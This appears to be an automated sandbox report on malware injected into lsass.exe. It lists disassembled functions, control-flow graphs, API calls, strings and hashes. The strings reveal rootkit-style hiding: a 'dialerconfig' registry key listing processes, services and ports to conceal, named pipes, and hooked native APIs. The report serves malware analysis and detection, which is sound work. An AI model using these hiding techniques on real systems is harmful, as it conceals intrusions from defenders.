549->520 549->537 555 213bdce2ecc-213bdce2ed0 550->555 556 213bdce2e57-213bdce2e5b 550->556 555->509 560 213bdce2e5d-213bdce2e61 556->560 561 213bdce2e63-213bdce2e7d call 213bdce85c0 556->561 560->561 563 213bdce2e80-213bdce2e83 560->563 561->563 566 213bdce2e85-213bdce2ea3 call 213bdce85c0 563->566 567 213bdce2ea6-213bdce2ea9 563->567 566->567 567->555 568 213bdce2eab-213bdce2ec9 call 213bdce85c0 567->568 568->555
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                        • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                        • API String ID: 2119608203-3850299575
                        • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                        • Instruction ID: 5807444a8450fc688cd656404e5327faf8bf80d9ed4d8e3fcbe0e129d3a2233c
                        • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                        • Instruction Fuzzy Hash: 16B190B2219A9883EF65CF25D4487E9A3A6FB68B8DF445026DE0953794FB36DF40C340
                        Function 00000213BDCE7D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                        • String ID:
                        • API String ID: 3140674995-0
                        • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                        • Instruction ID: b5ca2973510a18e9044a362400021c8bf4fd35d0e5851b09ad40746068c8bd5a
                        • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                        • Instruction Fuzzy Hash: E9311772209A848AEB60DF60E8847EE7366F79474CF44442ADA4E57A98EF39C748C710
                        Function 00000213BDCED2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                        • String ID:
                        • API String ID: 1239891234-0
                        • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                        • Instruction ID: 8c31cb887ca66331edc06f01b646ec043365c389dcc0a630b6fed02098722ee4
                        • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                        • Instruction Fuzzy Hash: 6B319E76218B8086EB60CF25E8443DE73A1F79975CF500126EA9D47B99EF39C75ACB00
                        Function 00000213BDCE1628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                        • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                        • API String ID: 106492572-2879589442
                        • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                        • Instruction ID: 9ce6f8576089a91c0a41a3022284374a307a37465a46bb01b2766921063186a7
                        • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                        • Instruction Fuzzy Hash: BE712A76318A5486EF10DF22E848AD923A6F7A4B8CF402121DE4E47B6DEF36C758C744
                        Function 00000213BDCE12BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                        • String ID: d
                        • API String ID: 2005889112-2564639436
                        • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                        • Instruction ID: 7e46c3b6a7d5331c3c7ee4b2a60feacf72bead3f45980719ba22298b4a17c25e
                        • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                        • Instruction Fuzzy Hash: 42514D76208B8487EB54CF62E5483DA77A2F799F9DF448124DA4A0B758EF3DC259CB00
                        Function 00000213BDCE1D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: CurrentThread$AddressHandleModuleProc
                        • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                        • API String ID: 4175298099-1975688563
                        • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                        • Instruction ID: 8f728ad5951c134e967336f2fc31f6c713d23b700de02865da5b7b8926e8932e
                        • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                        • Instruction Fuzzy Hash: D431E3B411998EA2EF01EF65EC697D4A323BB7435CF801023A44D0656AFF7A934DC391
                        Function 00000213BDCB6910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 326 213bdcb6910-213bdcb6916 327 213bdcb6951-213bdcb695b 326->327 328 213bdcb6918-213bdcb691b 326->328 331 213bdcb6a78-213bdcb6a8d 327->331 329 213bdcb691d-213bdcb6920 328->329 330 213bdcb6945-213bdcb6984 call 213bdcb6fc0 328->330 332 213bdcb6922-213bdcb6925 329->332 333 213bdcb6938 __scrt_dllmain_crt_thread_attach 329->333 349 213bdcb6a52 330->349 350 213bdcb698a-213bdcb699f call 213bdcb6e54 330->350 334 213bdcb6a9c-213bdcb6ab6 call 213bdcb6e54 331->334 335 213bdcb6a8f 331->335 337 213bdcb6931-213bdcb6936 call 213bdcb6f04 332->337 338 213bdcb6927-213bdcb6930 332->338 341 213bdcb693d-213bdcb6944 333->341 347 213bdcb6aef-213bdcb6b20 call 213bdcb7190 334->347 348 213bdcb6ab8-213bdcb6aed call 213bdcb6f7c call 213bdcb6e1c call 213bdcb7318 call 213bdcb7130 call 213bdcb7154 call 213bdcb6fac 334->348 339 213bdcb6a91-213bdcb6a9b 335->339 337->341 360 213bdcb6b22-213bdcb6b28 347->360 361 213bdcb6b31-213bdcb6b37 347->361 348->339 353 213bdcb6a54-213bdcb6a69 349->353 358 213bdcb69a5-213bdcb69b6 call 213bdcb6ec4 350->358 359 213bdcb6a6a-213bdcb6a77 call 213bdcb7190 350->359 376 213bdcb69b8-213bdcb69dc call 213bdcb72dc call 213bdcb6e0c call 213bdcb6e38 call 213bdcbac0c 358->376 377 213bdcb6a07-213bdcb6a11 call 213bdcb7130 358->377 359->331 360->361 365 213bdcb6b2a-213bdcb6b2c 360->365 366 213bdcb6b7e-213bdcb6b94 call 213bdcb268c 361->366 367 213bdcb6b39-213bdcb6b43 361->367 372 213bdcb6c1f-213bdcb6c2c 365->372 385 213bdcb6bcc-213bdcb6bce 366->385 386 213bdcb6b96-213bdcb6b98 366->386 373 213bdcb6b4f-213bdcb6b5d call 213bdcc5780 367->373 374 213bdcb6b45-213bdcb6b4d 367->374 379 213bdcb6b63-213bdcb6b78 call 213bdcb6910 373->379 389 213bdcb6c15-213bdcb6c1d 373->389 374->379 376->377 429 213bdcb69de-213bdcb69e5 __scrt_dllmain_after_initialize_c 376->429 377->349 399 213bdcb6a13-213bdcb6a1f call 213bdcb7180 377->399 379->366 379->389 395 213bdcb6bd0-213bdcb6bd3 385->395 396 213bdcb6bd5-213bdcb6bea call 213bdcb6910 385->396 386->385 394 213bdcb6b9a-213bdcb6bbc call 213bdcb268c call 213bdcb6a78 386->394 389->372 394->385 423 213bdcb6bbe-213bdcb6bc6 call 213bdcc5780 394->423 395->389 395->396 396->389 409 213bdcb6bec-213bdcb6bf6 396->409 416 213bdcb6a21-213bdcb6a2b call 213bdcb7098 399->416 417 213bdcb6a45-213bdcb6a50 399->417 414 213bdcb6c01-213bdcb6c11 call 213bdcc5780 409->414 415 213bdcb6bf8-213bdcb6bff 409->415 414->389 415->389 416->417 428 213bdcb6a2d-213bdcb6a3b 416->428 417->353 423->385 428->417 429->377 430 213bdcb69e7-213bdcb6a04 call 213bdcbabc8 429->430 430->377
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728820418.00000213BDCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCB0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdcb0000_lsass.jbxd
                        Similarity
                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                        • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                        • API String ID: 190073905-1786718095
                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                        • Instruction ID: f8cd9e1dbe3062c5f4ba020bde542ea39c0e4a61bba442b43b9d51f3a524e4ca
                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                        • Instruction Fuzzy Hash: 0781F4317DC24986FE50EB25D4493D966A3E7B4B8CF284025DA494B7D6FB3BCB468700
                        Function 00000213BDCECE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • GetLastError.KERNEL32 ref: 00000213BDCECE37
                        • FlsGetValue.KERNEL32(?,?,?,00000213BDCF0A6B,?,?,?,00000213BDCF045C,?,?,?,00000213BDCEC84F), ref: 00000213BDCECE4C
                        • FlsSetValue.KERNEL32(?,?,?,00000213BDCF0A6B,?,?,?,00000213BDCF045C,?,?,?,00000213BDCEC84F), ref: 00000213BDCECE6D
                        • FlsSetValue.KERNEL32(?,?,?,00000213BDCF0A6B,?,?,?,00000213BDCF045C,?,?,?,00000213BDCEC84F), ref: 00000213BDCECE9A
                        • FlsSetValue.KERNEL32(?,?,?,00000213BDCF0A6B,?,?,?,00000213BDCF045C,?,?,?,00000213BDCEC84F), ref: 00000213BDCECEAB
                        • FlsSetValue.KERNEL32(?,?,?,00000213BDCF0A6B,?,?,?,00000213BDCF045C,?,?,?,00000213BDCEC84F), ref: 00000213BDCECEBC
                        • SetLastError.KERNEL32 ref: 00000213BDCECED7
                        • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000213BDCF0A6B,?,?,?,00000213BDCF045C,?,?,?,00000213BDCEC84F), ref: 00000213BDCECF0D
                        • FlsSetValue.KERNEL32(?,?,00000001,00000213BDCEECCC,?,?,?,?,00000213BDCEBF9F,?,?,?,?,?,00000213BDCE7AB0), ref: 00000213BDCECF2C
                          • Part of subcall function 00000213BDCED6CC: HeapAlloc.KERNEL32 ref: 00000213BDCED721
                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000213BDCF0A6B,?,?,?,00000213BDCF045C,?,?,?,00000213BDCEC84F), ref: 00000213BDCECF54
                          • Part of subcall function 00000213BDCED744: HeapFree.KERNEL32 ref: 00000213BDCED75A
                          • Part of subcall function 00000213BDCED744: GetLastError.KERNEL32 ref: 00000213BDCED764
                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000213BDCF0A6B,?,?,?,00000213BDCF045C,?,?,?,00000213BDCEC84F), ref: 00000213BDCECF65
                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000213BDCF0A6B,?,?,?,00000213BDCF045C,?,?,?,00000213BDCEC84F), ref: 00000213BDCECF76
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: Value$ErrorLast$Heap$AllocFree
                        • String ID:
                        • API String ID: 570795689-0
                        • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                        • Instruction ID: 9cfdffa4e4f0b56bcb752030e4244594aa8fca63efa0d4e671618fb2b64398c0
                        • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                        • Instruction Fuzzy Hash: 85418DB424928C43FE68E371565E3F962435BB47BCF144738A83A476D7FE3AAB414600
                        Function 00000213BDCE2244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                        • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                        • API String ID: 2171963597-1373409510
                        • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                        • Instruction ID: 6b7d2558ae4a3ac574cfc8a772d118d668cf07695c60263a9c00d2c5ba11f754
                        • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                        • Instruction Fuzzy Hash: 2E213D7261864483EF10CB25F44879967A2F799BACF504215EA5906BA8EF3DC349CB04
                        Function 00000213BDCB9944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 582 213bdcb9944-213bdcb99ac call 213bdcba814 585 213bdcb99b2-213bdcb99b5 582->585 586 213bdcb9e13-213bdcb9e1b call 213bdcbbb48 582->586 585->586 588 213bdcb99bb-213bdcb99c1 585->588 589 213bdcb9a90-213bdcb9aa2 588->589 590 213bdcb99c7-213bdcb99cb 588->590 592 213bdcb9d63-213bdcb9d67 589->592 593 213bdcb9aa8-213bdcb9aac 589->593 590->589 594 213bdcb99d1-213bdcb99dc 590->594 597 213bdcb9da0-213bdcb9daa call 213bdcb8a34 592->597 598 213bdcb9d69-213bdcb9d70 592->598 593->592 595 213bdcb9ab2-213bdcb9abd 593->595 594->589 596 213bdcb99e2-213bdcb99e7 594->596 595->592 599 213bdcb9ac3-213bdcb9aca 595->599 596->589 600 213bdcb99ed-213bdcb99f7 call 213bdcb8a34 596->600 597->586 611 213bdcb9dac-213bdcb9dcb call 213bdcb6d40 597->611 598->586 601 213bdcb9d76-213bdcb9d9b call 213bdcb9e1c 598->601 603 213bdcb9ad0-213bdcb9b07 call 213bdcb8e10 599->603 604 213bdcb9c94-213bdcb9ca0 599->604 600->611 615 213bdcb99fd-213bdcb9a28 call 213bdcb8a34 * 2 call 213bdcb9124 600->615 601->597 603->604 619 213bdcb9b0d-213bdcb9b15 603->619 604->597 608 213bdcb9ca6-213bdcb9caa 604->608 612 213bdcb9cac-213bdcb9cb8 call 213bdcb90e4 608->612 613 213bdcb9cba-213bdcb9cc2 608->613 612->613 626 213bdcb9cdb-213bdcb9ce3 612->626 613->597 618 213bdcb9cc8-213bdcb9cd5 call 213bdcb8cb4 613->618 650 213bdcb9a2a-213bdcb9a2e 615->650 651 213bdcb9a48-213bdcb9a52 call 213bdcb8a34 615->651 618->597 618->626 624 213bdcb9b19-213bdcb9b4b 619->624 628 213bdcb9b51-213bdcb9b5c 624->628 629 213bdcb9c87-213bdcb9c8e 624->629 631 213bdcb9df6-213bdcb9e12 call 213bdcb8a34 * 2 call 213bdcbbaa8 626->631 632 213bdcb9ce9-213bdcb9ced 626->632 628->629 633 213bdcb9b62-213bdcb9b7b 628->633 629->604 629->624 631->586 635 213bdcb9d00 632->635 636 213bdcb9cef-213bdcb9cfe call 213bdcb90e4 632->636 637 213bdcb9b81-213bdcb9bc6 call 213bdcb90f8 * 2 633->637 638 213bdcb9c74-213bdcb9c79 633->638 646 213bdcb9d03-213bdcb9d0d call 213bdcba8ac 635->646 636->646 666 213bdcb9c04-213bdcb9c0a 637->666 667 213bdcb9bc8-213bdcb9bee call 213bdcb90f8 call 213bdcba038 637->667 643 213bdcb9c84 638->643 643->629 646->597 658 213bdcb9d13-213bdcb9d61 call 213bdcb8d44 call 213bdcb8f50 646->658 650->651 657 213bdcb9a30-213bdcb9a3b 650->657 651->589 665 213bdcb9a54-213bdcb9a74 call 213bdcb8a34 * 2 call 213bdcba8ac 651->665 657->651 662 213bdcb9a3d-213bdcb9a42 657->662 658->597 662->586 662->651 688 213bdcb9a8b 665->688 689 213bdcb9a76-213bdcb9a80 call 213bdcba99c 665->689 671 213bdcb9c0c-213bdcb9c10 666->671 672 213bdcb9c7b 666->672 682 213bdcb9bf0-213bdcb9c02 667->682 683 213bdcb9c15-213bdcb9c72 call 213bdcb9870 667->683 671->637 676 213bdcb9c80 672->676 676->643 682->666 682->667 683->676 688->589 692 213bdcb9df0-213bdcb9df5 call 213bdcbbaa8 689->692 693 213bdcb9a86-213bdcb9def call 213bdcb86ac call 213bdcba3f4 call 213bdcb88a0 689->693 692->631 693->692
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728820418.00000213BDCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCB0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdcb0000_lsass.jbxd
                        Similarity
                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                        • String ID: csm$csm$csm
                        • API String ID: 849930591-393685449
                        • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                        • Instruction ID: f386ab9bdd8cc4c87b67ff9b5e600b282352f279eca3ceb4b3cc66de4f1deea9
                        • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                        • Instruction Fuzzy Hash: 87E1AD32648B888AEF60DB65D4883DD77A2F769B8CF100115EE8957B99EF36C391C700
                        Function 00000213BDCEA544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 703 213bdcea544-213bdcea5ac call 213bdceb414 706 213bdcea5b2-213bdcea5b5 703->706 707 213bdceaa13-213bdceaa1b call 213bdcec748 703->707 706->707 708 213bdcea5bb-213bdcea5c1 706->708 710 213bdcea690-213bdcea6a2 708->710 711 213bdcea5c7-213bdcea5cb 708->711 713 213bdcea6a8-213bdcea6ac 710->713 714 213bdcea963-213bdcea967 710->714 711->710 715 213bdcea5d1-213bdcea5dc 711->715 713->714 716 213bdcea6b2-213bdcea6bd 713->716 718 213bdcea9a0-213bdcea9aa call 213bdce9634 714->718 719 213bdcea969-213bdcea970 714->719 715->710 717 213bdcea5e2-213bdcea5e7 715->717 716->714 720 213bdcea6c3-213bdcea6ca 716->720 717->710 721 213bdcea5ed-213bdcea5f7 call 213bdce9634 717->721 718->707 732 213bdcea9ac-213bdcea9cb call 213bdce7940 718->732 719->707 722 213bdcea976-213bdcea99b call 213bdceaa1c 719->722 724 213bdcea6d0-213bdcea707 call 213bdce9a10 720->724 725 213bdcea894-213bdcea8a0 720->725 721->732 737 213bdcea5fd-213bdcea628 call 213bdce9634 * 2 call 213bdce9d24 721->737 722->718 724->725 741 213bdcea70d-213bdcea715 724->741 725->718 729 213bdcea8a6-213bdcea8aa 725->729 734 213bdcea8ac-213bdcea8b8 call 213bdce9ce4 729->734 735 213bdcea8ba-213bdcea8c2 729->735 734->735 747 213bdcea8db-213bdcea8e3 734->747 735->718 740 213bdcea8c8-213bdcea8d5 call 213bdce98b4 735->740 772 213bdcea62a-213bdcea62e 737->772 773 213bdcea648-213bdcea652 call 213bdce9634 737->773 740->718 740->747 745 213bdcea719-213bdcea74b 741->745 749 213bdcea751-213bdcea75c 745->749 750 213bdcea887-213bdcea88e 745->750 752 213bdcea8e9-213bdcea8ed 747->752 753 213bdcea9f6-213bdceaa12 call 213bdce9634 * 2 call 213bdcec6a8 747->753 749->750 754 213bdcea762-213bdcea77b 749->754 750->725 750->745 756 213bdcea8ef-213bdcea8fe call 213bdce9ce4 752->756 757 213bdcea900 752->757 753->707 758 213bdcea781-213bdcea7c6 call 213bdce9cf8 * 2 754->758 759 213bdcea874-213bdcea879 754->759 762 213bdcea903-213bdcea90d call 213bdceb4ac 756->762 757->762 784 213bdcea7c8-213bdcea7ee call 213bdce9cf8 call 213bdceac38 758->784 785 213bdcea804-213bdcea80a 758->785 765 213bdcea884 759->765 762->718 782 213bdcea913-213bdcea961 call 213bdce9944 call 213bdce9b50 762->782 765->750 772->773 775 213bdcea630-213bdcea63b 772->775 773->710 788 213bdcea654-213bdcea674 call 213bdce9634 * 2 call 213bdceb4ac 773->788 775->773 781 213bdcea63d-213bdcea642 775->781 781->707 781->773 782->718 803 213bdcea7f0-213bdcea802 784->803 804 213bdcea815-213bdcea872 call 213bdcea470 784->804 792 213bdcea87b 785->792 793 213bdcea80c-213bdcea810 785->793 809 213bdcea68b 788->809 810 213bdcea676-213bdcea680 call 213bdceb59c 788->810 797 213bdcea880 792->797 793->758 797->765 803->784 803->785 804->797 809->710 813 213bdcea9f0-213bdcea9f5 call 213bdcec6a8 810->813 814 213bdcea686-213bdcea9ef call 213bdce92ac call 213bdceaff4 call 213bdce94a0 810->814 813->753 814->813
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                        • String ID: csm$csm$csm
                        • API String ID: 849930591-393685449
                        • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                        • Instruction ID: a4356b529713084a557e2c4423f012a0144f846992504cd020869ae66375d7b3
                        • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                        • Instruction Fuzzy Hash: E0E19BB26087888BEF20DB6594883DD77A6F76578CF100126EA8D97B95EB35E381C704
                        Function 00000213BDCEF394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: AddressFreeLibraryProc
                        • String ID: api-ms-$ext-ms-
                        • API String ID: 3013587201-537541572
                        • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                        • Instruction ID: 64b1116dec4a1fc2bb3371278ef814e94841622c5338f0fb36631d38e615d017
                        • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                        • Instruction Fuzzy Hash: 7941F6B231AA0442FE16CB56A8087D52393FB65BACF1442399D0D8B789FE3ED7458354
                        Function 00000213BDCE104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                        • String ID: d
                        • API String ID: 3743429067-2564639436
                        • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                        • Instruction ID: c9b898f511c2e52726208957a962c9b291cdc106b1d13140a09b1ea003ed6b20
                        • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                        • Instruction Fuzzy Hash: 9E417273218B84C6EB60CF21E4487DE77A2F399B9CF048125DA894B758EF39D659CB00
                        Function 00000213BDCED068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • FlsGetValue.KERNEL32(?,?,?,00000213BDCEC7DE,?,?,?,?,?,?,?,?,00000213BDCECF9D,?,?,00000001), ref: 00000213BDCED087
                        • FlsSetValue.KERNEL32(?,?,?,00000213BDCEC7DE,?,?,?,?,?,?,?,?,00000213BDCECF9D,?,?,00000001), ref: 00000213BDCED0A6
                        • FlsSetValue.KERNEL32(?,?,?,00000213BDCEC7DE,?,?,?,?,?,?,?,?,00000213BDCECF9D,?,?,00000001), ref: 00000213BDCED0CE
                        • FlsSetValue.KERNEL32(?,?,?,00000213BDCEC7DE,?,?,?,?,?,?,?,?,00000213BDCECF9D,?,?,00000001), ref: 00000213BDCED0DF
                        • FlsSetValue.KERNEL32(?,?,?,00000213BDCEC7DE,?,?,?,?,?,?,?,?,00000213BDCECF9D,?,?,00000001), ref: 00000213BDCED0F0
                        Strings
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: Value
                        • String ID: 1%$Y%
                        • API String ID: 3702945584-1395475152
                        • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                        • Instruction ID: 19c205c0411bc615aa3bccdf6f4f64bbad6ab17fba574e3ff0c824cae7453082
                        • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                        • Instruction Fuzzy Hash: 801184B070D24843FD64D725655E3E962475BB43FCF188338A87D466DAFE3AE7024600
                        Function 00000213BDCE7510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                        • String ID:
                        • API String ID: 190073905-0
                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                        • Instruction ID: 551094e2023b39dc9ace01dde74fdb1ba5573d69ed1bde9d232f088fcbd9e271
                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                        • Instruction Fuzzy Hash: 2B81D3B160C24987FE60EB66A44D3D92293ABB578CF344439E944477D6FB3BEB468700
